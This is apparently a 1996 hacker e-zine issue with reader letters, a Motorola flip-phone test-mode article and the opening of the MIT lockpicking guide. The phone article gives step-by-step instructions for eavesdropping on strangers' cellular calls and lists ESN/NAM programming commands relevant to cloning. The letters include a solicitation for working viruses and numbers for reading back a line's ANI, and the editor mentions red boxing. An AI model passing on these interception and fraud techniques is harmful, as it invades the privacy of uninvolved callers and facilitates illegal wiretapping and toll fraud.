Copy Link
Add to Bookmark
Report
Hackers Issue 06
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #6, February, 1996
Edited by: Revolution
-------------------
Hackers Forums
-------------------
From the editor . . . . . . . . . . . . . . . . . . . . . . . . Revolution
Letters . . . . . . . . . . . . . . . . . . . . . . . . .Hackers Worldwide
-------------------
Technology
-------------------
Motorola Flip Phone Fun . . . . . . . . . . . . . . . . . . . . . . Treker
MIT Guide to Lockpicking . . . . . . . . . . . . . . . . . . .Ted the Tool
Yet Another Login Spoof . . . . . . . . . . . . . . . . . . Brent Barnhill
--------------------
Politics
--------------------
A Request for Action . . . . . . . . . . . . . . . . . . . . . .Jim Warren
Cyberspace Makes the Difference . . . . . .Voters Telecommunications Watch
The End . . . . . . . . . . . . . . . . . . . . . . . . . . . . Revolution
----------------------------------------------------------------- ------------
copyright 1996 by Mike Scanlon All articles remain the property of their
authors, and may be reprinted with their permission This zine may be
reprinted freely as a whole electronically, for hard copy rights mail the
editor HACKERS is published monthly by Mike Scanlon, to be added to the
subscription list or to submit articles mail mrs3691@hertz.njit.edu
----------------------------------------------------------------- -------------
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #6, File #1 of 8
From the Editor
POW! Just like the sound effects of an old Batman rerun, Hackers is
back at you with another issue of gutwrenching telecommunications adventure.
Throw on your night vision goggles and don't forget your polka dotted box,
cover me honey, I'm going in!
The last couple of weeks hoodlums at NJIT have been seen passing the
early semester blues by red boxing to Brazil, and ordering long distance
coverage and 500 number service to the pay phones in the surrounding area.
Some of these hoodlums appear to have obvious behavioral problems.
But I've been steering clear of all that, concentrating on the mag
This issue has a few tech articles, along with a favorite of mine, although
it is from 1991 it is mostly still valid, the MIT guide to Lockpicking.
Politically, alot has been going on in cyberspace to be happy about, but much
more work is still to be done More information concerning the state of the
legislation involving the internet will be in next month's issue
For those of you who haven't heard, Defcon will be happening this
July, the 26th through the 28th, in Las Vegas. More info on this can be had
at http://www.defcon.com There is also a voice bridge set up by the
promoters of the event at (801) 855-3326. I have a VMB set up at that number,
box 2537, if anybody wants to leave me a message, and prefers not to use the
answering machine I have set up for the purpose. But some people are
impressed by those types of things.
Anyway, I am STILL looking for somebody to handle the bug and virus
of the month columns, if anyone finds the time or interest, drop me a line
I haven't made the 2600 meeting as I promised, but in the future I will try
to make it Other projects I've been talking about every month but never
gotten around to doing: putting up a decent website, and setting up a
telnetable site Both of these I promise to look into by summer. :)
Well, I've been spending the better part of my waking hours trying to
think of cool things I could do to increase reader participation in the zine.
I came up with one thing we could do for next issue A reader's write
contest! For next issue, as this is "Hackers" magazine, in 2 billion words or
less, describe the best hack you have ever heard of, or even better, the best
hack that you have ever pulled off The winner will receive an adequate
no-prize that I haven't decided upon yet but all the submissions will be
printed, so hopefully we'll have some comic relief next issue. So write yours
today, and let's see some submissions! Mrs3691@hertz.njit.edu.
..- Revolution
* * * * * * * * * * * * * * * * * * * *
As always, the standard disclaimer applies All of these articles are
provided for informational purposes only, Mike Scanlon and the respective
authors cannot be held accountable for any illegal acts they are used to
commit.
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #6, File #2 of 8
Letters
>From 0200717@ACAD.NWMISSOURI.EDUWed Jan 17 12:49:37 1996
Date: Thu, 11 Jan 1996 11:58:49 -0600 (CST)
From: RYAN ECCLES <0200717@ACAD.NWMISSOURI.EDU>
To: mrs3691@hertz.njit.edu
Subject: Hackers
Revolution,
Please include the following request in the next edition of Hackers. I
will be writing a cd-rom soon. I would like to write a cd-rom containing
viruses. This cd-rom can be used to load viruses to your computer in order to
test the effectiveness of your current virus scanner. Unfortunately, I don't
have 650MB of viruses. I know that most of you have a few viruses laying
around, and I would like them. I don't have the largest account in the world
either, so snail mail is the preffered method of transport. If you have some
viruses please send email to 0200717@acad.nwmissouri.edu and let me know the
name of the virus (if known) and the size of the virus (if known). If I don't
have the virus or viruses I will email my address to you. Please pkzip the file
place it on a 3.5 disk or an iomega zip disk. All disks will be returned upon
request. Contributors may receive a copy of the cd for 15 (slightly over the
cost of a blank cd rom keep in mind it takes a couple hours to write a cd
correctly and it may take time to get 650 MB of viruses from you.) All
info from contributors will be confidential unless otherwise requested NO
RECORDS WILL BE KEPT! This keeps both you and I out of trouble. REMEMBER THIS
DISK IS ONLY PROVIDED FOR SECURITY PURPOSES. I prefer to have working viruses,
and descriptions of the viruses as well as what they do.
Thanks HACKERS,
HACK ON!
----------------------------------------------------------------- --------------
>From wyle@max.tiac.netMon Jan 29 19:59:26 1996
Date: Sat, 27 Jan 1996 12:56:52 -0501 (EST)
From: Wyld Wyle <wyle@max.tiac.net>
To: michael r scanlon cis stnt <mrs3691@hertz.njit.edu>
Subject: Re: Hackers #5
Dear Mike,
I don't know if this is of any help to you but I have a number that will
tell you what Telephone number you are calling from, ie. I f you where
calling from a pay phone or a phone in an office and you wanted to know
what that number is you would call, also good for if you want the number
of a line that a computer is using for a data line. Also bear in mind
that I am from Boston and I don't know if it will work anywhere else, but
it is a 1-800 number so it might, It is 1-800-my-ani-is, after you dial
you will hear a beeping noise(the beep will continue, just type in the
code, the code is either 22, or 20, I forget, well hope this is of some
help to you.
.-Wyle
P.S E-mail me back and let me know if it worked!
[Wyle emailed me again and told me the code is 220 Although this number
works nationally, there are three digit numbers to call from every region
that will also give you your ANI, find yours out from your local BBS. Here
in Newark, and I think all of 201, the code is 958.
..- Revolution
----------------------------------------------------------------- --------------
From: IN%"hardguy@continuity.it.com.au" 26-JAN-1996 21:55:20.52
To: IN%"scanlonr@delphi.com"
CC:
Subj: Article update
In reference to Aftermath's article on Beigeboxing In Australia
(issue #4, file #4 of 9) The number to call (from anywhere) to
check what number you are calling from is 1114. 1115 also works
hopefully 111x also produces linesman test tones.
-h
----------------------------------------------------------------- --------------
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #6, File #3 of 8
***************************
* Motorola Flip Phone Fun *
* By *
* Treker *
***************************
So you got yourself a new Motorola Flip Phone, and now that you have
talked to someone goin 100 down the highway you want to have some real
fun.
Well one way is to use the Test Mode commands, these are used to test
the phone and set some of it's features. To use the test mode commands
you must first get into test mode, now to do this with your average flip
phone is pretty simple and here's how:
1.Take off your battery
2.Look at the back side of the phone where the battery used to be and
locate the three notches at the bottom.
3.Two prongs should be sticking out from the side notches.(See Diagram)
The three prongs
(notice the middle does not have a prong sticking out of it)
(also notice that on the battery there is also three contacts
but none of them stick out)
--- --- ---
| | | | | | | |
| / | | | | / |
| | | | | |
--- --- ---
4.The prongs are where the battery contacts connect with the phone.
5.To get into test mode you must create a prong for the middle notch so
makes contact with the middle contact on the battery.
6.To make the prong you could use Tin-Foil and just stick it into the
middle notch so it makes contact with the battery.
Any condutable piece of metal will make a good notch just as long as
it makes contact with the battery.
7.Now replace the battery and turn on the phone if it lights up normally
it did not work, so take off your battery and adjust your prong so it
definatly makes contact with the battery.
But if you see abunch of numbers flashing on the display, you are in
test mode.
Notice: If the phone dosen't even light up it's probably because the
prong is touching one of the other contacts, so just adjust
you middle prong until it works.
Now that you are in Test Mode it's time for some commands. Now to use
the commands you must press the # key and you will see:
US '
This means you are ready to enter commands!
I will give you a complete list below of the commands but I would like
to spend a little time on one in perticular, test mode command #11.
This is used to change cell channels and through this you can moniter
other calls!! Yes you read me correct, you can listen to other people
going 100 down the freeway.
To get it working you must first unmute audio or the conversations will
be too faint, so enter test mode command 08 at the prompt and you should
hear some noise in the speaker.
Then to change the channels, enter 11xxxx.
Where x equals the channal you want to listen to, in my area most of
the action happans in the 380 area, so I would enter: 11380 at the
prompt.
But the best way to find a conversation is just to scan around randomly.
In a big city you should get at least a couple of conversations. A channel
without a conversation just sounds like static, just thaught you should
know.
Below is the complete(up to date is a better word) list of test mode
commands some of them are useful and some of them are useless but beware
some of these commands could screw the phone up some good.
----------------------------CUT-HERE----------------------------- -----
# Enter Test Command Mode
00# no function
01# Restart (Re-enter DC power start-up routine.) On TDMA telephones, this
command has the same effect as pressing the PWR button.
02# Display Current Telephone Status (This is a non-altering version of the
STATUS DISPLAY On a 14 character display, all the information is shown.
On a 7 character display only the information on the second line of a 14
character display is shown On a 10 character display, all the
information on the second line of a 14 charcter display plus the last
three characters of the first line are shown.)
STATUS DISPLAY, ALTERNATES BETWEEN:
AAA BBB AAA = Channel Number (decimal) BBB = RSSI reading for channel
CDEFGHI are as follows:
C = SAT frequency (0=5970, 1=6000, 2=6030, 3=no channel lock)
D = Carrier (0=off, 1=on)
E = Signalling tone (0=off, 1=on)
F = Power attenuation level (0 through 7)
G = Channel mode (0=voice channel, 1=control channel)
H = Receive audio mute (0=unmuted, 1=muted)
I = Transmit audio mute (0=unmuted, 1=muted)
Press * to hold display and # to end.
03# Reset Autonomous Timer This command results in the reset of the
autonomous timer but does not provide any test function on these models.
04# Initializes Telephone to Standard Default Conditions:
Carrier Off, Power Level 0, Receiver Audio Muted, Transmit Audio Muted,
Signalling Tone Off, SAT Off, Resetting of Watch-Dog Timer Enabled,
DTMF and Audio Tones Off, Audio Path Set to Speaker
05# TX Carrier On (Key Transmitter)
06# TX Carrier Off
07# RX Audio Off (Mute Receiver Audio)
08# RX Audio On (Unmute Receiver Audio)
09# TX Audio Off
10# TX Audio On
11(Ch.No.)# Set Tranceiver to Channel xxxx (Receive and Transmit in Decimal;
accepts 1, 2, 3, or 4 digits)
see end of file for more info on this command
12x# Set Power Step to x; (0,1-7) 0=Maximum Power (3 Watts) 7=Minimum Power Out
13# Power Off (Shuts off the radio)
14# 10 kHz Signalling Tone On
15# 10 kHz Signalling Tone Off
16# Setup (Transmits a five word RECC message; each of the five words will
be "FF00AA55CC33." Transmitter de-keys at the end of the message.)
17# Voice (Transmits a two word REVC message; each of the two words will be
"FF00AA55CC33." Transmitter de-keys at the end of the message.)
18# C-Scan (Allows for entry of as many as 5 negative SID's for each NAM.)
Newer Motorola phones are equipped with a feature called C-Scan, this is
an option along with the standard A/B system selections C-Scan allows
the phone to be programed with up to five inhibited system ID's per NAM
This is designed to prevent the phone from roaming onto specified non-home
systems and therefore reduce "accidental" roaming fees.
1 C-Scan can only be programed from test mode, power phone up with the
relevant test mode contact grounded (see above).
2 Press # to access test mode.
3 Press 18#, the phone will display "0 40000".
4 Enter the first inhibited system ID and press *.
Continue to enter additional system ID's if required. After the 5th entry
the phone will display "N2". Press * to continue and add system ID's for
NAM 2 as required.
5 If an incorrect entry is made (outside the range of 00000-32767) the
display will not advance, press CLR and re-enter Use a setting of
40000 for any un-needed locations.
6 When the last entry has been made press * to store and press # to exit,
turn off power.
or
[**Phones without the C-Scan option used this command to SEND NAM.**]
18# SEND NAM Display shows AA BB Where AA=Address and BB=Data Displays
the contents of the NAM, one address at a time, advanced by pressing the
* key The following data is contained in NAM. The test is exited by
depressing the # key.
SIDH Sec. Code
OPT. (1,2,&3) MIN
MIN1, MIN2 FCHNA
SCM FCHNB
IPCH NDED
ACCOLC CHKSUM GIM
19# Display Software Version Number (4 digits displayed as year and week)
NOTE: Entering commands 20# through 23# or 27# causes the tranceiver to begin
a counting sequence or continous transmission as described below. In
order to exit from the commands to enter another test command, the #
key must be depressed; all other key depressions are ignored.
20# Receive control channel messages counting correctable and uncorrectable
errors When the command starts, the number of the command will be
displayed in the upper-right corner of the display Entering a # key
will terminate the command and display two three-digit numbers in the
display The first number is the number of correctable errors and the
second is the uncorrectable errors.
21# Received voice channel messages counting correctable and uncorrectable
errors When the command starts, the number of the command will be
displayed in the upper right-hand corner of the display Entering a #
key terminates the command and will display two three-digit numbers in
display The first is the number of correctable errors and the second
is the uncorrectable errors.
22# Receive control channel messages counting word sync sequence When the
command starts, the number of the command will be displayed in the upper
right-hand corner of the display Entering a # key will terminate the
command and display the number of word sync sequences in the display.
23# Receive voice channel messages counting word sync sequences When the
command starts, the number of the command will be displayed in the upper
right-hand corner of the display Entering a # key will terminate the
command and display the number of word sync sequences in the display.
24# Receive control channel data and display the majority voted busy/idle
bit 0=idle 1=busy
25x# SAT On When x=0, SAT=5970HZ
..x=1, SAT=6000HZ
..x=2, SAT=6030HZ
26# SAT Off
27# Transmit Data (Transmits continuous control channel data All words
will be "FF00AA55CC33." When the command starts, '27' will be displayed
in the right side of the display Entering a # key will terminate the
command The transmitter de-keys when finished.)
28# Activate the high tone (1150 Hz +/- 55 Hz)
29# De-activate the high tone
30# Activate the low tone (770 Hz +/- 40 Hz)
31# De-activate the low tone
32# Clear (Sets non-volatile memory to zeroes or factory default This
command will affect all counters, all repertory memory including the last
number called stack, and all user programmable features including the
setting of System Registration. It does not affect the ESN, NAM, phasing
data, or lock code This takes a minute or so DO NOT TURN OFF THE
TELEPHONE WHILE THIS IS SHOWING '32' ON THE DISPLAY WAIT UNTIL THE
NORMAL SERVICE LEVEL DISPLAY RESUMES!)
33x# Turn on DTMF for x (1-9, *, 0, #, plus the single tones)
Where x=1 697 Hz + 1209 Hz 10 697 Hz
2 697 Hz + 1336 Hz 11 770 Hz
3 697 Hz + 1477 Hz 12 852 Hz
4 770 Hz + 1209 Hz 13 941 Hz
5 770 Hz + 1336 Hz 14 1150 Hz (not used in cellular)
6 770 Hz + 1477 Hz 15 1209 Hz
7 852 Hz + 1209 Hz 16 1336 Hz
8 852 Hz + 1336 Hz 17 1477 Hz
9 852 Hz + 1477 Hz 18 1633 Hz (not used in cellular)
* 941 Hz + 1209 Hz
0 941 Hz + 1336 Hz
# 941 Hz + 1477 Hz
34# Turn DTMF Off
35# Display RSSI ("D" Series Portable Only)
or
35x# Set Audio Path to x x=0, V.S.P Microphone (Applies to mobiles only.)
x=1, Speaker
x=2, Alert
x=3, Handset
x=4, Mute
x=5, External Telephone (Applies to Portables Only)
x=6, External Handset (Applies to NEWER Portables)
36nnn# Scan (TDMA Telephones only Scans the primary control channels and
attempts to decipher the forward data stream. The display will show PASS1
if the strongest control channel was accessed, PASS2 if the second
strongest was accessed, and FAIL if no control channel could be accessed.)
(nnn=Scan speed in milliseconds). Tunes from channel 1 to 666 in order.
Entering a * pauses the scan and displays current Channel Number and
RSSI reading (AAA=Channel Number and BBB=RSSI Reading). When scan speed
is 300 milliseconds or greater, the current status is displayed during the
scan; when less than 300 milliseconds the status is displayed only during
pause. Entering * during a pause causes the scan to resume. Entering #
aborts the scan and leaves the mobile tuned to the current channel. During
this command only the * and # keys are recognized.
37# Sets Low Battery Threshold Usage: #37#x# where x is any number
from 1 to 255. If set to 1, the Low Battery indicator will come up
when the phone is powered on. If set to 255, it may never come up.
38# Display ESN (Displays ESN in four steps, two hexadecimal digits at a time
in a for digit display. The decimal shows the address, 00 through 03 as
the first two digits, and two digits of the ESN as the last two digits.
Use the 'G' to step through the entire hexadecimal ESN.)
Compander OFF ("D" Series Portables)
or
38# SND-SNM Display shows AA BB Where AA=Address;BB=Data Send the SNM
to the display. All 32 bytes of the SNM will be displayed, one byte at
a time. The byte address will be displayed in the upper right-hand
corner and the contents of that address will be displayed in the hex
The * key is used to step through the address similar to the SEND-NAM
(18#) command.
39# Compander ON ("D" Series Portables)
or
39# RCVSU Receive one control channel word. When the word is received it
is displayed in hex This command will be complete when a control channel
word is received or when the # key is entered to abort the command.
40# RCVVC Receive one voice channel word. When the word is received it is
displayed in hex. This command will be complete when a voice channel
word is received or when the # key is entered to abort the command.
41# Enables Diversity (On F19CTA Series only.)
42# Disables Diversity (On F19CTA Series only.)
43# Disable Diversity
USE T/R ANTENNA (On F19CTA Series only.)
USE R ANTENNA (On D.M.T./ Mini TAC)
44# Disable Diversity
USE R ANTENNA (On F19CTA Series only.)
USE T/R ANTENNA (On D.M.T./ Mini TAC)
45# Display Current RSSI (Displayed as a three-digit decimal number)
46# Display Cumulative Call Timer
47x# Set RX Audio level to X
(For F19CTA Series Tranceivers)
X=0, Lowest Volume
X=6, Highest Volume
X=7, mute
Normal setting is 4.
(For D.M.T./ Mini TAC Tranceivers)
X=0, Lowest Volume
X=7, Highest Volume
Normal setting is 4.
(For TDMA Tranceivers and F09F Series and Higher Portables)
X=0, Lowest Volume
X=15, Highest Volume
Normal setting is 2 to 4 (On TDMA
Tranceivers and Micro TAC portables,
settings 8 through 15 are for DTMF
applications only.)
48# Side Tone On Use this command in conjunction with 350# to test the
entire audio path in hands-free applications.
49# Side Tone Off
50# Maintenance data is transmitted and test results displayed:
PASS=received data is correct
FAIL 1=2second timeout, no data rec.
FAIL 2=received data is incorrect
51# Test of mobile where maintenance data is transmitted and looped back
Display is as follows:
PASS=looped-back data is correct
FAIL 1=2 second timeout, no looped-back data
FAIL 2=looped-back data is incorrect
52x# SAT Phase Adjustment A decimal value that corresponds to phase shift
compensation in 4.5 degree increments Compensation added to inherent
phase shift in tranceiver to achieve a total of 0 degrees phase shift.
Do NOT enter any values except those shown below.
0 degrees = 0 121.5 degrees = 59 243.0 degrees = 86
4.5 = 1 126.0 = 60 247.5 = 87
9.0 = 2 130.5 = 61 252.0 = 112
13.5 = 3 135.0 = 62 256.5 = 113
18.0 = 4 139.5 = 63 261.0 = 114
22.5 = 5 144.0 = 40 265.5 = 115
27.0 = 6 148.5 = 41 270.0 = 116
31.5 = 7 153.0 = 42 274.5 = 117
36.0 = 16 157.5 = 43 279.0 = 118
40.5 = 17 162.0 = 44 283.5 = 119
45.0 = 18 166.5 = 45 288.0 = 120
49.5 = 19 171.0 = 46 292.5 = 121
54.0 = 20 175.5 = 47 297.0 = 122
58.5 = 21 180.0 = 64 301.5 = 123
63.0 = 22 184.5 = 65 306.0 = 124
67.5 = 23 189.0 = 66 310.5 = 125
72.0 = 48 193.5 = 67 315.0 = 126
76.5 = 49 198.0 = 68 319.5 = 127
81.0 = 50 202.5 = 69 324.0 = 104
85.5 = 51 207.0 = 70 328.5 = 105
90.0 = 52 211.5 = 71 333.0 = 106
94.5 = 53 216.0 = 80 337.5 = 107
99.0 = 54 220.5 = 81 342.0 = 108
103.5 = 55 225.0 = 82 346.5 = 109
108.0 = 56 229.5 = 83 351.0 = 110
112.5 = 57 234.0 = 84 355.5 = 111
117.0 = 58 238.5 = 85 360.0 = 70
53# Enable scrambler option, when equipped.
54# Disable scrambler option, when equipped.
55# Display/Program N.A.M. (Test Mode Programming)
TEST MODE PROGRAMING:
Assuming you have completed one of the above steps correctly the phone
will wake up in test mode when you turn the power on When you first
access test mode the phone's display will alternate between various status
information that includes the received signal strength and channel number.
The phone will operate normally in this mode You can now access Service
Mode by pressing the # key, the display will clear and a ' will appear.
Use the following procedure to program the phone:
1 Enter 55# to access programing mode.
2 The * key advances to the next step (NOTE that test mode programing
does NOT have step numbers, each time you press the * key the phone
will display the next data entry).
3 The CLR key will revert the display to the previously stored data.
4 The # key aborts programing at any time.
5 To complete programing you must scroll through ALL entries until a '
appears in the display.
6 Note that some entries contain more digits than can be displayed by the
phone, in this case only the last part of the data can be seen.
TEST MODE PROGRAMING DATA:
STEP# #OF DIGITS/RANGE DESCRIPTION
01 00000 - 32767 SYSTEM ID
02 8 DIGIT BINARY OPTION PROGRAMING, SEE NOTE 1 BELOW
03 10 DIGITS MIN (AREA CODE & TEL#)
04 2 DIGITS STATION CLASS MARK
05 2 DIGITS ACCESS OVERLOAD CLASS
06 2 DIGITS GROUP ID (10 IN USA)
07 6 DIGITS SECURITY CODE
08 3 DIGITS LOCK CODE
09 3 DIGITS SERVICE LEVEL (LEAVE AT 004)
10 8 DIGIT BINARY OPTION PROGRAMING, SEE NOTE 2 BELOW
11 8 DIGIT BINARY OPTION PROGRAMING, SEE NOTE 3 BELOW
12 0333 OR 0334 INITIAL PAGING CHANNEL
13 0333 "A" SYSTEM IPCH
14 0334 "B" SYSTEM IPCH
15 3 DIGIT NUMBER PAGING CHANNEL (021 IN USA)
16 8 DIGIT BINARY OPTION PROGRAMING, SEE NOTE 4 BELOW
Steps 01 through 06 and 12 will repeat for NAM 2 if the second phone
number bit has been enabled in step 11.
NOTES:
Take care with Motorola's use of "0" and "1" Some options use "0" to
enable, some use "1".
These are eight digit binary fields used to select the following options:
1 (step 02 above, suggested entry is: 11101001 for "A" system, 10101001
for "B" sys)
Digit 1: Local use mark, 0 or 1.
Digit 2: Preferred system, 0 or 1.
Digit 3: End to end (DTMF) dialing, 1 to enable.
Digit 4: Not used, enter 0.
Digit 5: Repertory (speed) dialing, 1 to enable.
Digit 6: Auxiliary (horn) alert, 1 to enable.
Digit 7: Hands free (VSP) auto mute, 1 to enable (mutes outgoing hands
free audio until the MUTE key is pressed).
Digit 8: Min mark, 0 or 1.
2 (step 10 above, suggested entry is: 00000100)
Digits 1 - 4: Not used in USA, enter 0.
Digit 5: Single system scan, 1 to enable (scan A or B system only,
determined by bit 2 of step 02. Set to "0" to allow user the
option).
Digit 6: Super speed dial, 1 to enable (pressing N, or NN SND will
dial the number stored in memory location NN).
Digit 7: User selectable service level, 0 to enable (allows user to
set long distance/memory access dialing restrictions).
Digit 8: Lock function, 0 to enable (allows user to lock/un-lock the
phone, if this is set to 1 the phone can not be locked).
3 (step 11 above, suggested entry is: 00000000)
Digit 1: Handset programing, 0 to enable (allows access to programing
mode without having to enter test mode).
Digit 2: Second phone number (not all phones), 1 to enable.
Digit 3: Call timer access, 0 to enable.
Digit 4: Auto system busy redial, 0 to enable.
Digit 5: Speaker disable, 1 to enable (use with select VSP units only,
do not use with 2000 series mobiles).
Digit 6: IMTS/Cellular, 1 to enable (rarely used).
Digit 7: User selectable system registration, 0 to enable.
Digit 8: Dual antennae (diversity), 1 to enable.
4 (step 16 above, suggested entry is: 0011010 for portable and 0011011
for mobile units)
Digit 1: Not used, 0 only.
Digit 2: Not used, 0 only
Digit 3: Continuous DTMF, 1 to enable (software version 8735 and later)
Digit 4: 8 hour time-out, 0 to enable (software version 8735 and later)
Digit 5: Not used, 0 only.
Digit 6: Failed page indicator, 0 to enable (phone beeps when an
incoming call is detected but signal conditions prevent
completion of the call).
Digit 7: Portable scan, 0 for portable, 1 for mobile units.
56# no function
57x# Call Processing Mode
x=0, AMPS
x=1, NAMPS
x=2-4, RESERVED
x=5, TDMA signalling
x=6, TDMA signalling with loopback before decoding
x=7, TDMA signalling with loopback voice after decoding
x=8, TDMA signalling with loopback FACCH after decoding
x=9, TDMA forced synchronization
58# Compander On (Audio compressor and expander) (See 39#)
59# Compander Off (Audio compressor and expander) (See 38#)
60# no function
61# ESN Transfer (For Series I D.M.T./Mini TAC only)
62# Turn On Ringer Audio Path
63# Turn Off Ringer Audio Path
64#-65# no function
66# Identity Transfer (Series II Tranceivers and some Current Shipping Portables)
67# no function
68# Diaplay FLEX and Model Information
69# Used with Identity Transfer
70# Abbreviated field transmitter audio deviation command, for tranceivers
with FCC ID ABZ89FT5668.
71# Abbreviated field power adjustment command, for tranceivers with FCC ID
ABZ89FT5668.
72# Field audio phasing commands.
73# Field power adjustment command.
74#-99# no function
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #6, File #4 of 8
MIT Guide to Lockpicking
Ted the Tool
As I promised, here is the edited test to the MIT GIUDE TO LOCKSMITHING.
It's in the next 10 messages. Enjoy! The file's available for download
from my BBS as MITGUIDE.ZIP. Can be F'Reqed. The editing corrected the
collosal number of spelling and grammatical errors I found.
Regards,
Poor Richard
+ +
richard.bash@f68.n105.z1.fidonet.org Combat Arms BBS .
Also: dickbash@rigel.cs.pdx.edu P.O Box 913 .
Fido 1:105/68 Portland, OR 97201 .
Voice: 1-503-223-3160 BBS:1-503-221-1777 Shop: 1-503-640-3209 .
+ +
Combat Arms BBS
P.O. Box 913
Portland, Oregon 97207-0913
Voice: (503) 223-3160
BBS: (503) 221-1777
Fido 1:105/68
November 10, 1993
MIT Guide to Lockpicking
by
Ted the Tool
February 14, 1992
Distribution
Copyright 1987, 1991
Theodore T. Tool. All
right reserved.
Permission to reproduce this document on a non-profit basis
is granted provided that this copyright and distribution notice
is included in full. The information in this booklet is provided
for educational purposes only.
August 1991 revision.
Contents
1 It's Easy. . . . . . . . . . . . . . . . . . . . . . . . . . .
2 How a Key Opens a Lock . . . . . . . . . . . . . . . . . . . .
3 The Flatland Model . . . . . . . . . . . . . . . . . . . . . .
4 Basic Picking & The Binding Defect . . . . . . . . . . . . . .
5 The Pin Column Model . . . . . . . . . . . . . . . . . . . . .
6 Basic Scrubbing. . . . . . . . . . . . . . . . . . . . . . . .
7 Advanced Lockpicking . . . . . . . . . . . . . . . . . . . . .
7.1 Mechanical Skills . . . . . . . . . . . . . . . . . . . .
7.2 Zen and the Art of Lockpicking. . . . . . . . . . . . . .
7.3 Analytic Thinking . . . . . . . . . . . . . . . . . . . .
8 Exercises. . . . . . . . . . . . . . . . . . . . . . . . . . .
8.1 Exercise 1: Bouncing the pick . . . . . . . . . . . . . .
8.2 Exercise 2: Picking Pressure. . . . . . . . . . . . . . .
8.3 Exercise 3: Picking Torque. . . . . . . . . . . . . . . .
8.4 Exercise 4: Identifying Set Pins. . . . . . . . . . . . .
8.5 Exercise 5: Projections . . . . . . . . . . . . . . . . .
9 Recognizing and Exploiting Personality Traits. . . . . . . . .
9.1 Which Way To Turn . . . . . . . . . . . . . . . . . . . .
9.2 How Far to Turn . . . . . . . . . . . . . . . . . . . . .
9.3 Gravity . . . . . . . . . . . . . . . . . . . . . . . . .
9.4 Pins Not Setting. . . . . . . . . . . . . . . . . . . . .
9.5 Elastic Deformation . . . . . . . . . . . . . . . . . . .
9.6 Loose Plug. . . . . . . . . . . . . . . . . . . . . . . .
9.7 Pin Diameter. . . . . . . . . . . . . . . . . . . . . . .
9.8 Beveled Holes and Rounded pins. . . . . . . . . . . . . .
9.9 Mushroom Driver Pins. . . . . . . . . . . . . . . . . . .
9.10 Which Way To Turn . . . . . . . . . . . . . . . . . . . .
9.11 Which Way To Turn . . . . . . . . . . . . . . . . . . . .
9.12 Which Way To Turn . . . . . . . . . . . . . . . . . . . .
9.13 Disk Tumblers . . . . . . . . . . . . . . . . . . . . . .
10 Final Remarks. . . . . . . . . . . . . . . . . . . . . . . . .
A Tools. . . . . . . . . . . . . . . . . . . . . . . . . . . . .
A.1 Pick Shapes . . . . . . . . . . . . . . . . . . . . . . .
A.2 Street cleaner bristles . . . . . . . . . . . . . . . . .
A.3 Bicycle spokes. . . . . . . . . . . . . . . . . . . . . .
A.4 Brick Strap . . . . . . . . . . . . . . . . . . . . . . .
B Legal Issues . . . . . . . . . . . . . . . . . . . . . . . . .
INTRODUCTION
Hello,
My pseudonym is Ted The Tool. I wrote the "MIT Guide To
Lockpicking." Over the years I have followed this list and seen
many requests for the Guide in electronic form. For various
reasons I did not want to post it.
Over the summer I changed my mind, and decided to post it
as a postscript file. A postscript file would allow many people
to print it, while still allowing me some artistic control over
derivative works. I had planned to make several improvements
before posting it, but that seems moot now.
So, I will be posting the original postscript file as a
series of six e-mail message. Each message is about 62,000 bytes
long so they will pass through most mail forwarders. The
messages form a uuencoded, compressed, postscript file. To
reconstruct the guide, 1) remove the mail headers from the
messages, 2) concatenate them together (Unix cat command) to
make a file called MITLockGuide.ps.Z.uu, 3) run the uudecode
command on the resulting file to create the file
MITLockGuide.ps.Z, and 4) run uncompress on that file to create
MITLockGuide.ps, which you can send to a printer with the lpr
command. The result will be a file called MITLockGuide.ps with a
length of 818540 bytes and sum of "32380 800."
I would like to find some repositories for the Guide. If
you have an FTP site, and are willing to keep a copy of the
guide, please do so, and send me a message telling me its
location, so I can tell other people who want a copy of it. I do
not want to get into the business of mailing out individual
copies via e-mail. I would like to make it easy for other people
to find via archie, gopher, etc. If you are keeping a copy,
please use the name MITLockGuide.ps (or MITGuide.ps if you have
8 character limits on file names).
I would appreciate the following help:
- Convert the Guide to other formats so it can be
printed on non-postscript printers. Please let me know
about it, and post a message to alt.locksmithing.
- Convert the figures into a format that a modern
graphics program can manipulate. The figures were made
using the Illustrate program on a Symbolics
LispMachine (it was a nice machine in its day :-).
Please send the result back to me, and if you wish,
post it to the net.
- Write new subsections on lock defects and how to
exploit them for different kinds of pin-tumbler locks.
- Write a chapter on disk tumbler locks that includes a
discussion of the "pick-resistant" modifications (vee-
shaped notch in the disk that has a similar effect as
a mushroom-shaped driver.
- Write a chapter on Best locks that explains the
removable core feature (with pictures please), and
describes how to exploit the very high tolerances that
are used in manufacturing these locks.
- Expand the appendix on legal issues to cover all 50
states. Ideally, I would like a chart that showed the
requirements necessary to legally carry lockpicks in
each state.
- Describe other practice exercises that help people
learn the skills of lockpicking.
- Write similar guides for other types of locks. For
example, there could be a guide for ACE-type tubular
locks, and one for Simplex push-button locks. In my
mind, the Guide was intended to just cover pin-tumbler
locks, though the title is bigger than that. Perhaps,
if the other guides are small and there authors wanted
to, they could be added as chapters to the Guide.
- Any other additions you would like.
I would like the Guide to become the locksmithing
equivalent of GNU Emacs, which is something that is freely
distributed that many people contribute to. This is a great
opportunity for you to share your experience with other people
who share your interest in locks.
Sincerely,
Ted The Tool
---------------------------------------------------------
To find out more about the anon service, send mail to
help@anon.penet.fi. Due to the double-blind, any mail replies to
this message will be anonymized, and an anonymous id will be
allocated automatically. You have been warned. Please report any
problems, inappropriate use, etc. to admin@anon.penet.fi.
Chapter 1
IT'S EASY
The big secret of lockpicking is that it's easy. Anyone can
learn how to pick locks.
The theory of lockpicking is the theory of exploiting
mechanical defects. There are a few basic concepts and
definitions but the bulk of the material consists of tricks for
opening locks with particular defects or characteristics. The
organization of this manual reflects this structure. The first
few chapters present the vocabulary and basic information about
locks and lockpicking. There is no way to learn lockpicking
without practicing, so one chapter presents a set of carefully
chosen exercises that will help you learn the skills of
lockpicking. The document ends with a catalog of the mechanical
traits and defects found in locks and the techniques used to
recognize and exploit them. The first appendix describes how to
make lockpicking tools. The other appendix presents some of the
legal issues of lockpicking.
The exercises are important. The only way to learn how to
recognize and exploit the defects in a lock is to practice. This
means practicing many times on the same lock as well as
